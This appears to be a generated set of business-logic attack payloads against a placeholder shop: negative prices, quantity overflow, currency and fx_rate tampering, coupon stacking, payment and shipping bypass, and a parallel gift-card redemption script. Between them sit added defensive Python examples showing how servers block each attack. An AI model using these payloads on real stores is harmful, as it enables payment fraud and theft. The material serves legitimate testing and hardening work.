Generate payload examples for business logic vulnerabilities: price and payment manipulation, workflow step skipping, race condition attacks, IDOR privilege escalation, and mass assignment flaws. Configure your target app type and auth method to get context-accurate HTTP request examples.
# ── Negative Price / Quantity Attack ──────────────────────────────────
# Goal: cause total order value to go negative, receiving a refund or credit
# Test: set quantity to -1 or price to negative value
# JSON request body:
POST /api/cart/add HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"item_id": "ITEM-123",
"quantity": -1,
"price": -100.00
}
# Form data variant:
POST /checkout HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
item_id=ITEM-123&quantity=-1&price=-100.00&unit_price=-100.00
# What to check:
# 1. Does total become negative?
# 2. Is a refund/credit issued?
# 3. Does the order complete with negative total?
# 4. Try quantity=-2147483647 (integer underflow)

# ── Integer Overflow — Quantity Field ─────────────────────────────────
# Goal: overflow integer type to wrap to 0 or negative value
POST /api/order HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"item_id": "ITEM-123",
"quantity": 2147483647,
"price": 100.00
}
# Alternative: 32-bit unsigned max
{
"item_id": "ITEM-123",
"quantity": 4294967295
}
# Alternative: very large number (forces float → int truncation)
{
"item_id": "ITEM-123",
"quantity": 9999999999
}
# Expected overflow behavior:
# 2147483647 + 1 → -2147483648 (signed 32-bit overflow)
# Total: -2147483648 * 100.00 = massively negative value
# Check if server computes total client-side or server-side

# ── Currency Confusion Attack ─────────────────────────────────────────
# Goal: submit in low-value currency, get charged as if high-value currency
POST /api/payment HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"amount": 100.00,
"currency": "JPY",
"currency_code": "USD",
"display_currency": "USD"
}
# Tamper fx_rate parameter:
{
"amount": 100.00,
"currency": "USD",
"fx_rate": 0.001,
"base_currency": "EUR"
}
# Parameter pollution — send both:
POST /api/checkout?currency=USD HTTP/1.1
Content-Type: application/x-www-form-urlencoded
amount=100.00&currency=JPY&currency_code=USD
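The three sections above (negative quantity/price, integer overflow, currency confusion) all come down to one server-side defect: the handler reads quantity, price or currency from the request instead of from its own records. The Python below is an added defensive example, not code from this page or from any generator or tool it describes. CATALOG, CURRENCY_EXPONENT and MAX_QUANTITY are constructed stand-ins for the server's price list and business limits; the cart's currency is assumed to be fixed server-side when the cart is created.

```python
from decimal import Decimal, ROUND_HALF_UP

# Constructed server-side catalog: unit prices per item and per currency, as
# Decimal strings (never floats). A cart's currency is fixed when the cart
# is created; nothing in a later request can change it.
CATALOG = {"ITEM-123": {"USD": Decimal("100.00"), "JPY": Decimal("15000")}}
CURRENCY_EXPONENT = {"USD": 2, "JPY": 0}   # minor-unit digits per currency
MAX_QUANTITY = 1000                        # hypothetical per-line business limit


class InvalidLineItem(ValueError):
    pass


def validate_quantity(raw):
    """Accept only a plain positive int within the business limit.
    Rejects -1, 0, 2147483647, 4294967295, 9999999999, and also True,
    1.0 and "1", which loosely typed handlers often coerce silently.
    The bound is checked before any arithmetic or DB cast, which is where
    a fixed-width integer would otherwise wrap."""
    if isinstance(raw, bool) or not isinstance(raw, int):
        raise InvalidLineItem("quantity must be an integer")
    if not 1 <= raw <= MAX_QUANTITY:
        raise InvalidLineItem(f"quantity must be between 1 and {MAX_QUANTITY}")
    return raw


def price_line(cart_currency, item):
    """Price one cart line from the catalog. Any client-supplied price,
    unit_price, currency, currency_code, display_currency or fx_rate in
    the item dict is simply never read."""
    prices = CATALOG.get(item.get("item_id"))
    if prices is None or cart_currency not in prices:
        raise InvalidLineItem(f"unknown item {item.get('item_id')!r} in {cart_currency}")
    return prices[cart_currency] * validate_quantity(item.get("quantity"))


def price_cart(cart_currency, items):
    """Server-side total in the cart's own currency, rounded to its minor unit."""
    if cart_currency not in CURRENCY_EXPONENT:
        raise InvalidLineItem(f"unsupported currency {cart_currency!r}")
    total = sum((price_line(cart_currency, it) for it in items), Decimal("0"))
    return total.quantize(Decimal(1).scaleb(-CURRENCY_EXPONENT[cart_currency]),
                          rounding=ROUND_HALF_UP)


def check_line(cart_currency, item):
    """Report how one request body fares: ("ok", price) or ("rejected", reason)."""
    try:
        return ("ok", price_line(cart_currency, item))
    except InvalidLineItem as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # Constructed bodies mirroring the payloads above
    for body in ({"item_id": "ITEM-123", "quantity": -1, "price": -100.00},
                 {"item_id": "ITEM-123", "quantity": 2147483647},
                 {"item_id": "ITEM-123", "quantity": 9999999999},
                 {"item_id": "ITEM-123", "quantity": 1, "currency": "JPY", "fx_rate": 0.001}):
        print(body, "->", check_line("USD", body))
    print("cart total:", price_cart("USD", [{"item_id": "ITEM-123", "quantity": 2}]))
```

The quantity bound is deliberately a small business limit rather than the integer type's maximum: in Python the large values never overflow, but the same request will be cast to a 32-bit column or passed to a Java or C service downstream, and the check has to happen before that.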
# Also test: negative fx_rate, fx_rate=0, fx_rate=1000000

# ── Coupon Stacking — Apply Same Coupon Multiple Times ─────────────────
# Method 1: Direct repeated application
POST /api/cart/coupon HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{"coupon_code": "SAVE20", "cart_id": "cart_xyz"}
# Send same request 5x — check if discount stacks:
for i in {1..5}; do
  curl -s -X POST https://target.com/api/cart/coupon \
    -H 'Content-Type: application/json' \
    -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...' \
    -d '{"coupon_code":"SAVE20","cart_id":"cart_xyz"}'
done
# Method 2: Race condition — parallel coupon application
# Using Turbo Intruder (Burp Suite):
# engine = Engine.THREADED(30)
# for i in range(30):
#     engine.queue(target.req, ['SAVE20'])
# Method 3: Multiple coupon codes for same promotion
{"coupon_codes": ["SAVE20", "SAVE20", "SAVE20"]}
# Method 4: Case/whitespace variants
{"coupon_code": " SAVE20 "}
{"coupon_code": "save20"}
{"coupon_code": "SAVE20 "}

# ── Partial Payment Bypass ────────────────────────────────────────────
# Goal: complete order while paying minimal amount
POST /api/checkout/complete HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{
"order_id": "ITEM-123",
"amount": 0.01,
"total": 100.00,
"payment_status": "paid"
}
# Method 2: payment_method null bypass
{
"order_id": "ITEM-123",
"amount": 100.00,
"payment_method": null,
"skip_payment": true
}
# Method 3: Split payment exploitation
# Payment 1:
{"order_id": "ITEM-123", "amount": 0.01, "split": true, "split_index": 1}
# Then claim order is fully paid without sending payment 2
# Method 4: Tamper payment_amount after price calculated
POST /checkout/step3 HTTP/1.1
payment_token=tok_valid&payment_amount=0.01&order_total=100.00

# ── Gift Card Race Condition — Double Redemption ──────────────────────
# Goal: redeem same gift card twice via concurrent requests
# Single redemption:
POST /api/giftcard/redeem HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
{"code": "GIFT-XXXX-YYYY", "amount": 100.00}
# Race attack — send N requests simultaneously:
# Python asyncio example:
import asyncio, aiohttp

async def redeem(session, code):
    return await session.post(
        "https://target.com/api/giftcard/redeem",
        json={"code": code, "amount": 100.00}
    )

async def main():
    async with aiohttp.ClientSession() as session:
        tasks = [redeem(session, "GIFT-XXXX-YYYY") for _ in range(20)]
        results = await asyncio.gather(*tasks)
        for r in results:
            print(await r.json())

asyncio.run(main())
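The coupon-stacking section and the gift-card race above have the same server-side fix: the balance debit, or the attachment of a promotion to a cart, has to be one atomic conditional write, so that twenty parallel requests cannot all read the old balance (or a cart without the coupon) and all succeed. The following Python is an added example and not code from this page or any tool it describes. It uses SQLite so several threads contend for a real write lock; the tables, the GIFT-XXXX-YYYY card with a constructed 100.00 balance, the SAVE20 and SUMMER20 codes and their promotion ids are all constructed, and `race_redeem` plays the role of the asyncio script above against the hardened endpoint.

```python
import os
import sqlite3
import tempfile
from concurrent.futures import ThreadPoolExecutor

# Money is stored as integer minor units (cents). One SQLite file, not an
# in-memory DB, so each thread can open its own connection and contend for
# the write lock the way separate request workers would.


def create_db():
    path = os.path.join(tempfile.mkdtemp(), "shop.sqlite")
    con = sqlite3.connect(path)
    con.executescript("""
        PRAGMA journal_mode=WAL;
        CREATE TABLE giftcards (code TEXT PRIMARY KEY,
                                balance_cents INTEGER NOT NULL CHECK (balance_cents >= 0));
        CREATE TABLE redemptions (code TEXT, order_id TEXT, amount_cents INTEGER,
                                  UNIQUE (code, order_id));
        CREATE TABLE coupons (code TEXT PRIMARY KEY, promotion_id TEXT NOT NULL);
        CREATE TABLE cart_coupons (cart_id TEXT, promotion_id TEXT,
                                   UNIQUE (cart_id, promotion_id));
        -- constructed fixtures: one 100.00 card, two codes for the same promotion
        INSERT INTO giftcards VALUES ('GIFT-XXXX-YYYY', 10000);
        INSERT INTO coupons VALUES ('SAVE20', 'promo-20pct'), ('SUMMER20', 'promo-20pct');
    """)
    con.close()
    return path


def _connect(path):
    # Autocommit mode plus explicit BEGIN IMMEDIATE: take the write lock first
    # and wait (up to 10 s) instead of failing while another request holds it.
    return sqlite3.connect(path, timeout=10, isolation_level=None)


def redeem_giftcard(path, code, order_id, amount_cents):
    """Debit the card with a single conditional UPDATE. Concurrent requests
    serialize on the write lock; each one re-evaluates balance >= amount
    against the committed value, so only the requests the balance covers
    get rowcount 1. The UNIQUE (code, order_id) row makes a retried request
    for the same order idempotent. Returns True on success."""
    if isinstance(amount_cents, bool) or not isinstance(amount_cents, int) or amount_cents <= 0:
        return False
    con = _connect(path)
    try:
        con.execute("BEGIN IMMEDIATE")
        cur = con.execute(
            "UPDATE giftcards SET balance_cents = balance_cents - ? "
            "WHERE code = ? AND balance_cents >= ?",
            (amount_cents, code, amount_cents))
        if cur.rowcount != 1:          # unknown card or insufficient balance
            con.execute("ROLLBACK")
            return False
        con.execute("INSERT INTO redemptions VALUES (?, ?, ?)", (code, order_id, amount_cents))
        con.execute("COMMIT")
        return True
    except sqlite3.IntegrityError:     # this order already redeemed this card
        con.execute("ROLLBACK")
        return False
    finally:
        con.close()


def apply_coupon(path, cart_id, raw_code):
    """Normalize the code, map it to its promotion, and let the UNIQUE
    constraint refuse a second coupon for the same promotion on the cart,
    whether it arrives as a repeat, a parallel request, a case or
    whitespace variant, or an alias code for the same promotion."""
    code = raw_code.strip().upper()
    con = _connect(path)
    try:
        row = con.execute("SELECT promotion_id FROM coupons WHERE code = ?", (code,)).fetchone()
        if row is None:
            return False
        con.execute("INSERT INTO cart_coupons VALUES (?, ?)", (cart_id, row[0]))
        return True
    except sqlite3.IntegrityError:
        return False
    finally:
        con.close()


def balance(path, code):
    con = _connect(path)
    try:
        return con.execute("SELECT balance_cents FROM giftcards WHERE code = ?", (code,)).fetchone()[0]
    finally:
        con.close()


def race_redeem(path, code, n=20, amount_cents=10000):
    """Fire n simultaneous full-balance redemptions with distinct order ids
    and return how many succeeded (the balance check must allow exactly one)."""
    with ThreadPoolExecutor(max_workers=n) as pool:
        return sum(pool.map(lambda i: redeem_giftcard(path, code, f"ord-{i}", amount_cents), range(n)))


if __name__ == "__main__":
    db = create_db()
    print("successful redemptions out of 20:", race_redeem(db, "GIFT-XXXX-YYYY"))
    print("remaining balance (cents):", balance(db, "GIFT-XXXX-YYYY"))
```

The same shape carries to any SQL engine: `UPDATE ... WHERE balance >= :amount` with a rowcount check, or `SELECT ... FOR UPDATE` inside the transaction, and a uniqueness constraint on (cart, promotion) rather than an application-level "is it already applied?" read followed by a separate insert. The CHECK on balance_cents is a last line of defence that turns any future bug into a failed statement instead of a negative balance.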
# Check if balance goes negative or multiple successes returned

# ── Shipping Cost Manipulation ────────────────────────────────────────
# Goal: bypass shipping cost by tampering hidden fields
POST /checkout/shipping HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
shipping_method=standard&shipping_cost=0&order_total=100.00&item_id=ITEM-123
# Method 2: Add free shipping coupon after total calculation
# Step 1: Calculate total (100.00 + shipping cost)
POST /api/cart/calculate
{"item_id": "ITEM-123", "quantity": 1}
# Response: {"total": 100.00, "shipping": 9.99, "order_id": "ord_123"}
# Step 2: Apply free shipping coupon to calculated order
POST /api/cart/coupon
{"coupon_code": "FREESHIP", "order_id": "ord_123"}
# Step 3: Re-submit with shipping_cost=0 from modified response
POST /checkout/confirm
{"order_id": "ord_123", "shipping_cost": 0, "total": 100.00}
# Also test: negative shipping cost to reduce order total below zero
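The partial-payment and shipping-cost sections above both depend on the confirmation endpoint reading amount, payment_status, skip_payment or shipping_cost from the request. The defensive pattern is to allow-list the request body, recompute the order total from server-side state, and mark the order paid only when the payment provider itself (queried server-to-server, never via a field in the request) reports a capture for exactly that total. The Python below is an added example, not code from this page or any tool it describes; SHIPPING_RATES, FREE_SHIPPING_PROMOS, ALLOWED_CHECKOUT_FIELDS, the ord_123 order fixture and the PROVIDER_LEDGER tokens are constructed, and `provider_lookup` is a hypothetical stand-in for the provider's API.

```python
from decimal import Decimal

# Constructed server-side data: shipping rate table, promotions that waive
# shipping, and the only request fields the confirm endpoint may read.
SHIPPING_RATES = {"standard": Decimal("9.99"), "express": Decimal("24.99")}
FREE_SHIPPING_PROMOS = {"FREESHIP"}
ALLOWED_CHECKOUT_FIELDS = {"order_id", "payment_token"}


class CheckoutRejected(Exception):
    pass


def read_request(request_json):
    """Allow-list the body. payment_status, skip_payment, amount, total,
    order_total, shipping_cost and split_* are never read, and their presence
    fails the request loudly instead of being merged into the order."""
    unexpected = set(request_json) - ALLOWED_CHECKOUT_FIELDS
    if unexpected:
        raise CheckoutRejected(f"unexpected fields: {sorted(unexpected)}")
    return request_json


def expected_total(order):
    """What this order costs, recomputed from server-side rows only."""
    subtotal = sum((Decimal(line["unit_price"]) * line["quantity"]
                    for line in order["items"]), Decimal("0"))
    shipping = SHIPPING_RATES[order["shipping_method"]]
    if FREE_SHIPPING_PROMOS & set(order["promotions"]):
        shipping = Decimal("0")    # decided by the order's stored promotions, not a field
    return subtotal + shipping


def confirm_checkout(order, request_json, provider_lookup):
    """Mark the order paid only when the provider reports a capture for
    exactly the recomputed total in the order's currency.
    provider_lookup(token) stands in for a server-to-server API call."""
    body = read_request(request_json)
    if body.get("order_id") != order["id"]:
        raise CheckoutRejected("order_id does not match")
    capture = provider_lookup(body.get("payment_token"))
    if capture is None or capture["status"] != "captured":
        raise CheckoutRejected("no captured payment for token")
    total = expected_total(order)
    if capture["currency"] != order["currency"] or Decimal(capture["amount"]) != total:
        raise CheckoutRejected(f"captured {capture['amount']} {capture['currency']}, "
                               f"order total is {total} {order['currency']}")
    order["status"] = "paid"
    return total


# Constructed fixtures: one order and a fake provider ledger keyed by token.
def sample_order(promotions=()):
    return {"id": "ord_123", "currency": "USD", "status": "pending",
            "shipping_method": "standard", "promotions": list(promotions),
            "items": [{"item_id": "ITEM-123", "unit_price": "100.00", "quantity": 1}]}


PROVIDER_LEDGER = {
    "tok_full":  {"status": "captured",   "amount": "109.99", "currency": "USD"},
    "tok_penny": {"status": "captured",   "amount": "0.01",   "currency": "USD"},
    "tok_free":  {"status": "captured",   "amount": "100.00", "currency": "USD"},
    "tok_auth":  {"status": "authorized", "amount": "109.99", "currency": "USD"},
}


def try_confirm(order, request_json):
    """Run one checkout attempt and report ("paid", total) or ("rejected", reason)."""
    try:
        return ("paid", str(confirm_checkout(order, request_json, PROVIDER_LEDGER.get)))
    except CheckoutRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for body in ({"order_id": "ord_123", "payment_token": "tok_full"},
                 {"order_id": "ord_123", "payment_token": "tok_penny"},
                 {"order_id": "ord_123", "payment_token": "tok_full", "skip_payment": True},
                 {"order_id": "ord_123", "payment_token": "tok_full", "shipping_cost": 0}):
        print(body, "->", try_confirm(sample_order(), body))
```

If the business genuinely supports split payments, sum the provider's captures for the order on the server side and compare that sum with the recomputed total; the client still never states how much it has paid.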